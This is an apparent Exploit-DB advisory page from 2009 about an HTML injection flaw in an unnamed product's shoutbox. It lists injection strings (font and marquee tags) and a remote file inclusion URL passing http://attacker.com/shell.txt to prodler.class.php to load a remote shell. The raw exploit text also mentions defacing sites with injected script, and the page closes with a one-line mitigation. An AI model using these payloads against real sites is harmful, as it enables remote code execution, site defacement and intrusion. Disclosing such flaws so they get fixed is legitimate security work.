HTML Injection Vulnerability

vendor:

N/A

by:

andresg888

8.8

CVSS

HIGH

HTML Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

HTML Injection Vulnerability

Go to the shoutbox and type <font color="red">red text</font> or <marquee>hi</marquee> or http://server/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? to exploit the vulnerability.

Mitigation:

Input validation and output encoding should be used to prevent HTML injection.

Source

Exploit-DB raw data:

##########################[andresg888]##########################
#Web: : www.ilegalintrusion.net<http://www.ilegalintrusion.net> & www.bl4ck-p0rtal.org<http://www.bl4ck-p0rtal.org>
########################################################################
#Exploit :
# Go to the shoutbox and type:
# <font color="red">red text</font>
# or
# <marquee>hi</marquee>
# or
# 
########################################################################
#3xplo!t :
#http://server/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt???
########################################################################
#Greetz : _84kur10_ , Brunos_50
#Special Thanks : all members from ilegalintrusion & black-portal
########################################################################
# It is obvious that if you allow javascript or html injection code can make a document.Inner
# so with a little imagination could Defacer the site with a script.
###########################[andresg888#################################